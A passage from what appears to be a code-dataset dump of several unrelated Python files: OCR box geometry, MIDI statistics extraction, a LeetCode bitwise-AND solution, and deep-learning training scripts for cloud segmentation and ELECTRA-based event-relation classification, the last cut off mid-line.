delta_b * math.sin(alpha))\n x_top_right = int(x_top_right - delta_b * math.sin(alpha))\n\n elif tg_alpha > 0:\n tg_alpha = abs(tg_alpha)\n alpha = math.atan(tg_alpha)\n\n y_down_left, y_down_right = int(y_down_left + delta_b * math.cos(alpha)), int(y_down_right + delta_b * math.cos(alpha))\n x_down_left = int(x_down_left - delta_b * math.sin(alpha))\n x_down_right = int(x_down_right - delta_b * math.sin(alpha))\n\n y_top_left, y_top_right = int(y_top_left - delta_b * math.cos(alpha)), int(y_top_right - delta_b * math.cos(alpha))\n x_top_left = int(x_top_left + delta_b * math.sin(alpha))\n x_top_right = int(x_top_right + delta_b * math.sin(alpha))\n else:\n y_top_left, y_top_right, y_down_left, y_down_right = y_top_left - delta_b, y_top_right - delta_b, y_down_left + delta_b, y_down_right + delta_b\n print('After')\n print(word)\n print('[x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left] = ', \n [x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left])\n\n return y_top_left, y_top_right, y_down_left, y_down_right, x_top_left, x_top_right, x_down_left, x_down_right\n\n\ndef lin_reg(x_down_left_word, y_down_left_word, x_down_right_word, y_down_right_word):\n x = np.array(x_down_left_word + x_down_right_word).reshape((-1, 1))\n y = np.array(y_down_left_word + y_down_right_word)\n\n model = LinearRegression().fit(x, y)\n print('intercept:', model.intercept_)\n print('slope:', model.coef_)\n k = model.coef_[0]\n b = model.intercept_\n return k, b, model\n\ndef perspective_transform_coordinates(coordinates, m_matrix):\n \"\"\"\n Function Description: Apply perspective transformation to coordinates.\n Parameters:\n Return Value:\n Exception Description:\n Change History:\n 2020-07-30 12:00 function created.\n \"\"\"\n \"\"\"center = (0, 0)\n newrow = [0, 0, 1]\n r_matrix = cv2.getRotationMatrix2D(center, 0.0, 1.0)\n r_matrix = np.vstack([r_matrix, newrow])\n m_matrix = np.dot(M, r_matrix)\"\"\"\n\n # Perform the actual coordinates processing\n coordinates.append(1)\n new_coordinates = np.dot(m_matrix, coordinates)\n new_coordinates[0] = round(new_coordinates[0] / new_coordinates[2], 1)\n new_coordinates[1] = round(new_coordinates[1] / new_coordinates[2], 1)\n return new_coordinates[:2]\n\nif __name__=='__main__':\n main('/home/sondors/SynthText_ubuntu/results/1.h5')","sub_path":"recognizer_dataset.py","file_name":"recognizer_dataset.py","file_ext":"py","file_size_in_byte":14056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"625396047","text":"import joblib\nimport glob\nimport os\nimport pretty_midi\n\n# PANDAS\nimport pandas as pd\n\nclass ImportMIDI(): \n def __init__(self, num_files=1000): \n\n all_files = glob.glob(os.path.join('..', 'lmd_aligned', '*', '*', '*', '*', '*.mid'))\n files_to_use = all_files[0:num_files]\n statistics = joblib.Parallel(n_jobs=100, verbose=50)(\n joblib.delayed(self.compute_statistics)(midi_file)\n for midi_file in files_to_use)\n # When an error occurred, None will be returned; filter those out.\n statistics = [s for s in statistics if s is not None]\n\n df = pd.DataFrame(statistics)\n\n self.imported_MIDI_data = df[df[\"program_numbers\"].apply(self.has_all_instruments)].reset_index(drop=True)\n \n \n def get_midi_data(self): \n return self.imported_MIDI_data \n \n def compute_statistics(self, midi_file):\n \"\"\"\n Given a path to a MIDI file, compute a dictionary of statistics about it\n\n Parameters\n ----------\n midi_file : str\n Path to a MIDI file.\n\n Returns\n -------\n statistics : dict\n Dictionary reporting the values for different events in the file.\n \"\"\"\n # Some MIDI files will raise Exceptions on loading, if they are invalid.\n # We just skip those.\n try:\n pm = pretty_midi.PrettyMIDI(midi_file)\n # Extract informative events from the MIDI file\n return {'n_instruments': len(pm.instruments),\n 'program_numbers': [i.program for i in pm.instruments if not i.is_drum],\n 'key_numbers': [k.key_number for k in pm.key_signature_changes],\n 'tempos': list(pm.get_tempo_changes()[1]),\n 'time_signature_changes': pm.time_signature_changes,\n 'end_time': pm.get_end_time(),\n 'lyrics': [l.text for l in pm.lyrics],\n 'path': midi_file,\n 'midi': pm}\n # Silently ignore exceptions for a clean presentation (sorry Python!)\n except Exception as e:\n pass\n \n def has_all_instruments(self, program_numbers):\n \"\"\"\n Checks if the program numbers contain all four desired instruments\n\n Parameters\n ----------\n program numbers : list of program numbers\n\n Returns\n -------\n True : if program numbers contains all four desired instruments\n False : otherwise\n \"\"\"\n piano_program_numbers = set([0, 1, 2, 3, 4])\n guitar_program_numbers = set([25, 26, 27, 28, 29])\n bass_program_numbers = set([33, 34, 35, 36, 37, 38, 52])\n string_program_numbers = set([41, 42, 43, 49, 50, 51])\n\n return not set(program_numbers).isdisjoint(piano_program_numbers) and \\\n not set(program_numbers).isdisjoint(guitar_program_numbers) and \\\n not set(program_numbers).isdisjoint(bass_program_numbers) and \\\n not set(program_numbers).isdisjoint(string_program_numbers) ","sub_path":"importMIDI.py","file_name":"importMIDI.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"330987658","text":"# NOTE (to self) DEPRECATED! Use json-schema-to-java-common.py instead\nimport os\n\n\nPATH = r'C:\\dev\\projects\\idea\\isin-schema-message-generator\\src\\main\\java\\com\\etradingsoftware\\symbology\\generator\\template\\foreign_exchange'\n\n\nclass FilenamesToList(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def get_list():\n files = []\n\n for f in os.listdir(PATH):\n files.append(f)\n\n return files\n\n @staticmethod\n def to_java_class(files):\n java_classes = []\n\n for f in files:\n java_classes.append(f.replace('.java', ''))\n\n return java_classes\n\n\nif __name__ == '__main__':\n filenamesToList = FilenamesToList()\n files = filenamesToList.get_list()\n java_classes = filenamesToList.to_java_class(files)\n\n for java_class in java_classes:\n print(java_class)\n\n","sub_path":"Scripts/2017/ets/json-schema-to-java-util/filenames-to-list/filenames-to-list.py","file_name":"filenames-to-list.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"377716713","text":"\"\"\"\n201. Bitwise AND of Numbers Range\nMedium\n\nGiven a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive.\n\nExample 1:\n\nInput: [5,7]\nOutput: 4\n\nExample 2:\n\nInput: [0,1]\nOutput: 0\n\"\"\"\n\n###############################################################################\n\"\"\"\nSolution: another way to find common leftmost part of m and n.\n\nhttps://leetcode.com/problems/bitwise-and-of-numbers-range/discuss/56721/2-line-Solution-with-detailed-explanation\n\n\"\"\"\nclass Solution:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n while m < n:\n n &= n - 1 # unset R-most 1-bit in n\n\n return n\n\n###############################################################################\n\"\"\"\nSolution 2: find common leftmost part of m and n.\n\nIf m != n, then they have different parity and the final bits are different.\nSo shift both m and down to right to remove final bits.\nKeep going until m == n.\nThis happens when we reached the common left part of m and n.\nThen we shift back to the left by the same amount we shifted to the right.\n\nAnother way to look at it:\nTraversing from m to n, the bits keep changing, with the bits further to\nthe right changing more frequently. The bits that change cause the AND of\nthe range to have a 0 at the corresponding positions. A bit doesn't change\nunless all the bits to its right have changed. So the only 1-bits in the\nAND of the range are the leftmost bits that m and n share.\n\nO(log max(m,n)) time: worst case is when both m and n need to be shifted to 0.\nO(1) extra space\n\n\"\"\"\nclass Solution2:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n k = 0\n\n while m != n:\n k += 1\n m >>= 1\n n >>= 1\n\n return m << k\n\n\"\"\"\nSolution 2b: recursive version.\n\"\"\"\nclass Solution2b:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n if n > m: # n != m\n return self.rangeBitwiseAnd(m >> 1, n >> 1) << 1\n \n return m\n\n###############################################################################\n\"\"\"\nSolution 3:\n\nAny range that includes 0 has answer 0.\nAny range that includes both 1 and 2 has answer 0.\n\nExample: contains two different powers of 2, so answer is 0.\n\n2 = 0b0010\n3 = 0b0011\n4 = 0b0100\n\nLargest range that contains only one power of 2 is like [9, 31].\nThe only power of 2 in [2^k + 1, 2^(k+2) - 1] is 2^(k+1).\nSmallest example is [1, 2].\n\nExample of range that contains only one power of 2: [9, 31]\n9 = 0b00_1001\n10 = 0b00_1010\n16 = 0b01_0000\n31 = 0b01_1111\nAnswer is 0.\n\n15 & 16 = 0b0_1111 & 0b1_0000 = 0\n\n*** If a range includes a power of 2 and the number just before it,\nthen the answer is 0.\nSuppose p is a power of 2 in the range and its only 1-bit is the kth bit.\nThen p-1 has kth bit 0. So p & (p-1) = 0. So the bitwise AND or the range is 0.\n\nWe can tell a range is like this if NOT all the numbers in it share the same\nL-most 1-bit. In particular, we can check the first and last number.\n\nAssume if a range includes a power of 2, then it is the only power of 2 in the\nrange, and that the range begins with that power of 2.\nThat is, assume all numbers in the range share the same L-most 1-bit.\n\nThis 1-bit corresponds to the largest power of 2 that is <= m.\nWe can then subtract m from each number in the range, and recursively\ncalculate for the new range.\n\nExample: range [5, 7]\n5 = 0b101\n6 = 0b110\n7 = 0b111\n\nThey all share the same L-most 1-bit, which corresponds to 4.\nBiggest power of 2 that is < m = 5 is 4.\n\nSubtract 4 from all to get new range [1, 3]:\n1 = 0b001\n2 = 0b010\n3 = 0b011\n\nThey do not share the same L-most 1-bit, so the bitwise AND for this range is 0.\n\nCombining answers give 4 + 0 = 4.\n\n\"\"\"\nclass Solution3:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n def left_bit(n): # return position of leftmost 1-bit (-1 for n=0)\n count = -1\n while n:\n n >>= 1\n count += 1\n\n return count\n\n if m == 0:\n return 0\n # if m == 1:\n # return int(n == 1)\n\n k = left_bit(m)\n if k != left_bit(n):\n return 0\n\n res = 1 << k\n\n return res | self.rangeBitwiseAnd(m - res, n - res)\n\n###############################################################################\n\"\"\"\nSolution 4: brute force\n\nTLE\n\"\"\"\nclass Solution4:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n s = m\n \n for i in range(m+1, n+1):\n s &= i\n if s == 0:\n return 0\n \n return s\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(m, n, comment=None): \n print(\"=\"*80)\n if comment:\n print(comment)\n\n print(f\"\\nm = {m}\")\n print(f\"n = {n}\")\n \n res = sol.rangeBitwiseAnd(m, n)\n\n print(f\"\\nresult = {res}\\n\")\n\n sol = Solution() # find common L-most part by unsetting R-most 1-bit of n until n < m\n \n #sol = Solution2() # find common L-most part by checking m != n and doing >> 1\n #sol = Solution2b() # recursive version\n \n #sol = Solution3() # use fact that if p is power of 2, then p & (p-1) = 0.\n\n #sol = Solution4() # brute force; TLE\n\n comment = 'LC ex1; answer = 4'\n m = 5\n n = 7\n test(m, n, comment)\n\n comment = 'LC ex2; answer = 0'\n m = 0\n n = 1\n test(m, n, comment)\n\n comment = 'LC TC; answer = 2'\n m = 2\n n = 2\n test(m, n, comment)\n\n comment = 'LC TC; answer = 0'\n m = 2\n n = 4\n test(m, n, comment)\n\n comment = '; answer = 32'\n m = 33\n n = 63\n test(m, n, comment)\n\n comment = \"LC TC; answer = 0\"\n m = 600000000\n n = 2147483645\n test(m, n, comment)\n","sub_path":"bits/0201_bitwise_and_of_numbers_range.py","file_name":"0201_bitwise_and_of_numbers_range.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"463931926","text":"import argparse\nimport os\nimport multiprocessing\n\nfrom dataset import get_dataset, prepare_dataset, get_train_test, CloudDataset, get_preprocessing\nfrom augmentations import training1, valid1\nfrom aspp import aspp, resize_like, NewBCELoss\nfrom radam import RAdam\nfrom torch.optim import AdamW, Adam\nfrom schedulers import NoamLR\n\nimport segmentation_models_pytorch as smp\nfrom torch.utils.data import DataLoader\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torch.optim import SGD\nimport torch\n\nimport catalyst\nfrom catalyst.dl import utils\nfrom catalyst.dl.runner import SupervisedRunner\nfrom catalyst.dl.callbacks import DiceCallback, EarlyStoppingCallback, CriterionCallback, OptimizerCallback\n\nfrom dice import NewDiceCallback\n\ndef main():\n parser=argparse.ArgumentParser()\n parser.add_argument('--encoder', type=str, default='efficientnet-b0')\n parser.add_argument('--model', type=str, default='unet')\n parser.add_argument('--pretrained', type=str, default='imagenet')\n parser.add_argument('--logdir', type=str, default='../logs/')\n parser.add_argument('--exp_name', type=str)\n parser.add_argument('--data_folder', type=str, default='../input/')\n parser.add_argument('--height', type=int, default=320)\n parser.add_argument('--width', type=int, default=640)\n parser.add_argument('--batch_size', type=int, default=2)\n parser.add_argument('--accumulate', type=int, default=8)\n parser.add_argument('--epochs', type=int, default=20)\n parser.add_argument('--enc_lr', type=float, default=1e-2)\n parser.add_argument('--dec_lr', type=float, default=1e-3)\n parser.add_argument('--optim', type=str, default=\"radam\")\n parser.add_argument('--loss', type=str, default=\"bcedice\")\n parser.add_argument('--schedule', type=str, default=\"rlop\")\n parser.add_argument('--early_stopping', type=bool, default=True)\n \n\n args = parser.parse_args()\n\n encoder = args.encoder\n model = args.model\n pretrained = args.pretrained\n logdir = args.logdir\n name = args.exp_name\n data_folder = args.data_folder\n height = args.height\n width = args.width\n bs = args.batch_size\n accumulate = args.accumulate\n epochs = args.epochs\n enc_lr = args.enc_lr\n dec_lr = args.dec_lr\n optim = args.optim\n loss = args.loss\n schedule = args.schedule\n early_stopping = args.early_stopping\n\n if model == 'unet':\n model = smp.Unet(\n encoder_name=encoder,\n encoder_weights=pretrained,\n classes=4,\n activation=None\n )\n if model == 'fpn':\n model = smp.FPN(\n encoder_name=encoder,\n encoder_weights=pretrained,\n classes=4,\n activation=None,\n )\n if model =='pspnet':\n model = smp.PSPNet(\n encoder_name=encoder,\n encoder_weights=pretrained,\n classes=4,\n activation=None,\n )\n if model == 'linknet':\n model = smp.Linknet(\n encoder_name=encoder,\n encoder_weights=pretrained,\n classes=4,\n activation=None,\n )\n if model == 'aspp':\n print('aspp can only be used with resnet34')\n model = aspp(num_class=4)\n\n preprocessing_fn = smp.encoders.get_preprocessing_fn(encoder, pretrained)\n log = os.path.join(logdir, name)\n\n ds = get_dataset(path=data_folder)\n prepared_ds = prepare_dataset(ds)\n\n train_set, valid_set = get_train_test(ds)\n\n train_ds = CloudDataset(df=prepared_ds, datatype='train', img_ids=train_set, transforms=training1(h=height, w=width), preprocessing=get_preprocessing(preprocessing_fn), folder=data_folder)\n valid_ds = CloudDataset(df=prepared_ds, datatype='train', img_ids=valid_set, transforms=valid1(h=height, w=width), preprocessing=get_preprocessing(preprocessing_fn), folder=data_folder)\n\n train_loader = DataLoader(train_ds, batch_size=bs, shuffle=True, num_workers=multiprocessing.cpu_count())\n valid_loader = DataLoader(valid_ds, batch_size=bs, shuffle=False, num_workers=multiprocessing.cpu_count())\n\n loaders = {\n 'train': train_loader,\n 'valid': valid_loader,\n }\n\n num_epochs = epochs\n \n if args.model != \"aspp\":\n if optim == \"radam\":\n optimizer = RAdam([\n {'params': model.encoder.parameters(), 'lr': enc_lr},\n {'params': model.decoder.parameters(), 'lr': dec_lr},\n ])\n if optim == \"adam\":\n optimizer = Adam([\n {'params': model.encoder.parameters(), 'lr': enc_lr},\n {'params': model.decoder.parameters(), 'lr': dec_lr},\n ])\n if optim ==\"adamw\":\n optimizer = AdamW([\n {'params': model.encoder.parameters(), 'lr': enc_lr},\n {'params': model.decoder.parameters(), 'lr': dec_lr},\n ])\n if optim == \"sgd\":\n optimizer = SGD([\n {'params': model.encoder.parameters(), 'lr': enc_lr},\n {'params': model.decoder.parameters(), 'lr': dec_lr},\n ])\n elif args.model == 'aspp':\n if optim == \"radam\":\n optimizer = RAdam([\n {'params': model.parameters(), 'lr': enc_lr},\n ])\n if optim == \"adam\":\n optimizer = Adam([\n {'params': model.parameters(), 'lr': enc_lr},\n ])\n if optim ==\"adamw\":\n optimizer = AdamW([\n {'params': model.parameters(), 'lr': enc_lr},\n ])\n if optim == \"sgd\":\n optimizer = SGD([\n {'params': model.parameters(), 'lr': enc_lr},\n ])\n\n scheduler = ReduceLROnPlateau(optimizer, factor=0.1, patience=5)\n if schedule == \"rlop\":\n scheduler = ReduceLROnPlateau(optimizer, factor=0.15, patience=3)\n if schedule == \"noam\":\n scheduler = NoamLR(optimizer, 10)\n\n if loss == \"bcedice\":\n criterion = smp.utils.losses.BCEDiceLoss(eps=1.)\n if loss == \"dice\":\n criterion = smp.utils.losses.DiceLoss(eps=1.)\n if loss == \"bcejaccard\":\n criterion = smp.utils.losses.BCEJaccardLoss(eps=1.)\n if loss == \"jaccard\":\n criterion == smp.utils.losses.JaccardLoss(eps=1.)\n if loss == 'bce':\n criterion = NewBCELoss()\n\n callbacks = [NewDiceCallback(), CriterionCallback()]\n\n callbacks.append(OptimizerCallback(accumulation_steps=accumulate))\n if early_stopping:\n callbacks.append(EarlyStoppingCallback(patience=5, min_delta=0.001))\n\n runner = SupervisedRunner()\n runner.train(\n model=model,\n criterion=criterion,\n optimizer=optimizer,\n scheduler=scheduler,\n loaders=loaders,\n callbacks=callbacks,\n logdir=log,\n num_epochs=num_epochs,\n verbose=True,\n )\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"working/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"53194068","text":"# 事件关系分类模块\r\n# 作者:宋杨\r\nfrom nl2tensor import *\r\nfrom process_control import *\r\nimport os\r\nimport re\r\nfrom utils.argutils import print_args\r\n# from pathlib import Path\r\nimport argparse\r\nimport json\r\nfrom torch.autograd import Variable\r\nimport torch.optim\r\nimport numpy as np\r\nfrom tqdm import trange\r\nfrom language_model.transformers.configuration_electra import ElectraConfig\r\nfrom my_optimizers import Ranger\r\nfrom sklearn.model_selection import train_test_split\r\nfrom torch.utils.data import DataLoader, TensorDataset, RandomSampler\r\nfrom language_model.transformers import ElectraTokenizer\r\nfrom nn.my_embeddings import MyElectraModel\r\nfrom models.cnn_model import *\r\nimport datetime\r\n\r\n\r\n# 设置全局变量\r\ndef set_args(filename):\r\n parser = argparse.ArgumentParser()\r\n # 可调参数\r\n parser.add_argument(\"--train_epochs\",\r\n default=20, # 默认5\r\n type=int,\r\n help=\"训练次数大小\")\r\n parser.add_argument(\"--role_lr\",\r\n default=5e-2,\r\n type=float,\r\n help=\"Role_Embeddings初始学习步长\")\r\n parser.add_argument(\"--embeddings_lr\",\r\n default=5e-4,\r\n type=float,\r\n help=\"Embeddings初始学习步长\")\r\n parser.add_argument(\"--encoder_lr\",\r\n default=5e-3,\r\n type=float)\r\n parser.add_argument(\"--learning_rate\",\r\n default=5e-3,\r\n type=float)\r\n parser.add_argument(\"--weight_decay\", default=0, type=float)\r\n parser.add_argument(\"--train_batch_size\",\r\n default=16, # 默认8\r\n type=int,\r\n help=\"训练时batch大小\")\r\n parser.add_argument(\"--max_sent_len\",\r\n default=128, # 默认256\r\n type=int,\r\n help=\"文本最大长度\")\r\n parser.add_argument(\"--test_size\",\r\n default=.0,\r\n type=float,\r\n help=\"验证集大小\")\r\n parser.add_argument(\"--train_data_dir\",\r\n default='data/RnR_data/train/',\r\n type=str,\r\n help=\"The input data dir.\")\r\n parser.add_argument(\"--test_data_dir\",\r\n default='data/RnR_data/test/',\r\n type=str)\r\n parser.add_argument(\"--mymodel_config_dir\",\r\n default='config/relation_classify_config.json',\r\n type=str)\r\n parser.add_argument(\"--mymodel_save_dir\",\r\n default='checkpoint/relation_classify/',\r\n type=str)\r\n parser.add_argument(\"--pretrained_model_dir\",\r\n default='pretrained_model/pytorch_electra_180g_large/',\r\n type=str)\r\n parser.add_argument(\"--vocab_dir\",\r\n default='pretrained_model/pytorch_electra_180g_large/vocab.txt',\r\n type=str,\r\n help=\"The vocab data dir.\")\r\n parser.add_argument(\"--rel2label\",\r\n default={'Causal': 0, 'Follow': 1, 'Accompany': 2, 'Concurrency': 3, 'Other': 4},\r\n type=list)\r\n parser.add_argument(\"--max_role_size\",\r\n default=13,\r\n type=int)\r\n parser.add_argument(\"--do_train\",\r\n default=True,\r\n action='store_true',\r\n help=\"训练模式\")\r\n parser.add_argument(\"--do_eval\",\r\n default=True,\r\n action='store_true',\r\n help=\"验证模式\")\r\n parser.add_argument(\"--no_gpu\",\r\n default=False,\r\n action='store_true',\r\n help=\"用不用gpu\")\r\n parser.add_argument(\"--seed\",\r\n default=6,\r\n type=int,\r\n help=\"初始化时的随机数种子\")\r\n parser.add_argument(\"--gradient_accumulation_steps\",\r\n default=1,\r\n type=int,\r\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\r\n parser.add_argument(\"--optimize_on_cpu\",\r\n default=False,\r\n action='store_true',\r\n help=\"Whether to perform optimization and keep the optimizer averages on CPU.\")\r\n parser.add_argument(\"--fp16\",\r\n default=False,\r\n action='store_true',\r\n help=\"Whether to use 16-bit float precision instead of 32-bit.\")\r\n parser.add_argument(\"--loss_scale\",\r\n default=128,\r\n type=float,\r\n help=\"Loss scaling, positive power of 2 values can improve fp16 convergence.\")\r\n parser.add_argument(\"--local_rank\",\r\n type=int,\r\n default=-1,\r\n help=\"local_rank for distributed training on gpus\")\r\n parser.add_argument(\"--no_cuda\",\r\n default=False,\r\n action='store_true')\r\n args = parser.parse_args()\r\n print_args(args, parser)\r\n with open(filename, 'w') as f:\r\n json.dump(args.__dict__, f, indent=2)\r\n return args\r\n\r\n\r\n# 设置全局环境\r\ntry:\r\n args = set_args('config/relation_classify_args.txt')\r\nexcept FileNotFoundError:\r\n args = set_args('config/relation_classify_args.txt')\r\nlogger = get_logger()\r\nset_environ()\r\ntoday = datetime.datetime.now()\r\nmy_time = str(today.year)+'-'+str(today.month)+'-'+str(today.day)\r\nif args.local_rank == -1 or args.no_cuda:\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\r\n n_gpu = torch.cuda.device_count()\r\nelse:\r\n torch.cuda.set_device(args.local_rank)\r\n device = torch.device(\"cuda\", args.local_rank)\r\n n_gpu = 1\r\n torch.distributed.init_process_group(backend='nccl')\r\nloss_device = torch.device(\"cpu\")\r\nlogger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(\r\n device, n_gpu, bool(args.local_rank != -1), args.fp16))\r\nif args.gradient_accumulation_steps < 1:\r\n raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\r\n args.gradient_accumulation_steps))\r\n\r\n\r\n# 定义一个计算准确率的函数\r\ndef accuracy(preds, labels, seq_len):\r\n count, right = 0.1, 0.1\r\n for pred, label in zip(preds, labels):\r\n for i in range(seq_len):\r\n if label[i] != len(args.tag_to_ix) - 1 and label[i] != len(args.tag_to_ix) - 2 \\\r\n and label[i] != len(args.tag_to_ix) - 3 and label[i] != len(args.tag_to_ix) - 4:\r\n count += 1\r\n _, p = pred[i].topk(1)\r\n if int(label[i]) == p[0].item():\r\n right += 1\r\n return right / count\r\n\r\n\r\n# 关系转label\r\ndef rel2label(t_label, args):\r\n try:\r\n return args.rel2label[t_label]\r\n except:\r\n return len(args.rel2label)-1\r\n\r\ndef sync(device: torch.device):\r\n # FIXME\r\n return\r\n # For correct profiling (cuda operations are async)\r\n if device.type == \"cuda\":\r\n torch.cuda.synchronize(device)\r\n\r\n# 网络训练\r\ndef mymodel_train(args, logger, train_dataloader, validation_dataloader):\r\n config = ElectraConfig.from_pretrained(args.mymodel_config_dir)\r\n embedding = MyElectraModel(config=config)\r\n model = RelClassifyModel(config=config, args=args)\r\n # try:\r\n # output_model_file = os.path.join(args.mymodel_save_dir, 'embedding/')\r\n # model_state_dict = torch.load(os.path.join(output_model_file, 'pytorch_model.bin'))\r\n # embedding.load_state_dict(model_state_dict)\r\n # except OSError:\r\n # embedding.from_pretrained(os.path.join(args.pretrained_model_dir, 'pytorch_model.bin'), config=config)\r\n # print(\"PretrainedEmbeddingNotFound\")\r\n # try:\r\n # model.load(os.path.join(args.mymodel_save_dir, \"mymodel.bin\"))\r\n # except OSError:\r\n # print(\"PretrainedMyModelNotFound\")\r\n embedding.from_pretrained(os.path.join(args.pretrained_model_dir, 'pytorch_model.bin'), config=config)\r\n if args.fp16:\r\n embedding.half()\r\n model.half()\r\n embedding.to(device)\r\n model.to(device)\r\n model.set_loss_device(loss_device)\r\n param_optimizer1 = list(embedding.named_parameters())\r\n param_optimizer2 = list(model.named_parameters())\r\n optimizer_grouped_parameters1 = [\r\n {'params': [p for n, p in param_optimizer1 if any(nd in n for nd in ['role_embeddings'])],\r\n 'weight_decay_rate': args.weight_decay,\r\n 'lr': args.role_lr},\r\n {'params': [p for n, p in param_optimizer1 if not any(nd in n for nd in ['role_embeddings'])],\r\n 'lr': args.embeddings_lr},\r\n ]\r\n optimizer_grouped_parameters2 = [\r\n {'params': [p for n, p in param_optimizer2 if any(nd in n for nd in ['encoder'])],\r\n 'lr': args.encoder_lr},\r\n {'params': [p for n, p in param_optimizer2 if not any(nd in n for nd in ['encoder'])],\r\n 'lr': args.learning_rate},\r\n ]\r\n optimizer1 = Ranger(optimizer_grouped_parameters1)\r\n optimizer2 = Ranger(optimizer_grouped_parameters2)\r\n epochs = args.train_epochs\r\n bio_records, train_loss_set, acc_records = [], [], []\r\n embedding.train()\r\n model.train()\r\n for _ in trange(epochs, desc='Epochs'):\r\n tr_loss = 0\r\n eval_loss, eval_accuracy = 0, 0\r\n nb_tr_steps = 0\r\n nb_eval_steps = 0\r\n tmp_loss = []\r\n for step, batch in enumerate(train_dataloader):\r\n batch = tuple(t.to(device) for t in batch)\r\n b_input_ids1, b_input_ids2, b_labels, input_role1, input_role2 = batch\r\n sync(device)\r\n b_input_ids1 = b_input_ids1.squeeze(1).long()\r\n b_input_ids2 = b_input_ids2.squeeze(1).long()\r\n text_embedding1 = embedding(input_ids=b_input_ids1, role_ids=input_role1)\r\n text_embedding2 = embedding(input_ids=b_input_ids2, role_ids=input_role2)\r\n sync(device)\r\n loss, tmp_eval_accuracy = model(text_embedding1, text_embedding2, b_labels)\r\n sync(loss_device)\r\n optimizer1.zero_grad()\r\n optimizer2.zero_grad()\r\n loss.backward()\r\n optimizer1.step()\r\n optimizer2.step()\r\n tr_loss += loss.item()\r\n nb_tr_steps += 1\r\n eval_accuracy += tmp_eval_accuracy\r\n nb_eval_steps += 1\r\n tmp_loss.append(loss.item())\r\n adjust_learning_rate(optimizer1, 0.9)\r\n adjust_learning_rate(optimizer2, 0.9)\r\n try:\r\n train_loss_set.append(tr_loss / nb_tr_steps)\r\n logger.info('mymodel训练损失:{:.2f},准确率为:{:.2f}%'\r\n .format(tr_loss / nb_tr_steps, 100 * eval_accuracy / nb_eval_steps))\r\n acc_records.append(eval_accuracy / nb_eval_steps)\r\n bio_records.append(np.mean(train_loss_set))\r\n except ZeroDivisionError:\r\n logger.info(\"错误!请降低batch大小\")\r\n embedding_to_save = embedding.module if hasattr(embedding, 'module') else embedding\r\n torch.save(embedding_to_save.state_dict(),\r\n os.path.join(os.path.join(args.mymodel_save_dir, 'embedding/'), my_time+'pytorch_model.bin'))\r\n model.save(os.path.join(args.mymodel_save_dir, my_time+\"mymodel.bin\"))\r\n return embedding, model\r\n\r\n\r\n# 网络测试\r\ndef mymodel_test(logger, test_dataloader, the_time=my_time):\r\n config = ElectraConfig.from_pretrained(args.mymodel_config_dir)\r\n embedding = MyElectraModel(config=config)\r\n model = RelClassifyModel(config=config, args=args)\r\n output_model_file = os.path.join(args.mymodel_save_dir, 'embedding/')\r\n model_state_dict = torch.load(os.path.join(output_model_file, the_time+'pytorch_model.bin'))\r\n embedding.load_state_dict(model_state_dict)\r\n model.load(os.path.join(args.mymodel_save_dir, the_time+\"mymodel.bin\"))\r\n if args.fp16:\r\n embedding.half()\r\n model.half()\r\n embedding.to(device)\r\n model.to(device)\r\n embedding.eval()\r\n model.eval()\r\n acc_records = []\r\n eval_loss, eval_accuracy = 0, 0\r\n nb_eval_steps = 0\r\n for step, batch in enumerate(test_dataloader):\r\n batch = tuple(t.to(device) for t in batch)\r\n b_input_ids1, b_input_ids2, b_labels, input_role1, input_role2 = batch\r\n b_input_ids1 = b_input_ids1.squeeze(1).long()\r\n b_input_ids2 = b_input_ids2.squeeze(1).long()\r\n with torch.no_grad():\r\n text_embedding1 = embedding(input_ids=b_input_ids1, role_ids=input_role1)\r\n text_embedding2 = embedding(input_ids=b_input_ids2, role_ids=input_role2)\r\n tmp_eval_accuracy = model.test(text_embedding1, text_embedding2, b_labels, input_role1, input_role2)\r\n eval_accuracy += tmp_eval_accuracy\r\n nb_eval_steps += 1\r\n try:\r\n logger.info('准确率为:{:.2f}%'\r\n .format(100 * eval_accuracy / nb_eval_steps))\r\n acc_records.append(eval_accuracy / nb_eval_steps)\r\n except ZeroDivisionError:\r\n logger.info(\"错误!请降低batch大小\")\r\n return acc_records\r\n\r\n\r\ndef mymodel_cal(logger, test_dataloader, the_time=my_time):\r\n config = ElectraConfig.from_pretrained(args.mymodel_config_dir)\r\n embedding = MyElectraModel(config=config)\r\n model = RelClassifyModel(config=config, args=args)\r\n output_model_file = os.path.join(args.mymodel_save_dir, 'embedding/')\r\n model_state_dict = torch.load(os.path.join(output_model_file, the_time+'pytorch_model.bin'))\r\n embedding.load_state_dict(model_state_dict)\r\n output_model_file = os.path.join(args.mymodel_save_dir, the_time+\"mymodel.bin\")\r\n model_state_dict = torch.load(output_model_file)\r\n model.load_state_dict(model_state_dict)\r\n if args.fp16:\r\n embedding.half()\r\n model.half()\r\n embedding.to(device)\r\n model.to(device)\r\n embedding.eval()\r\n model.eval()\r\n target_size = len(args.rel2label)\r\n result = 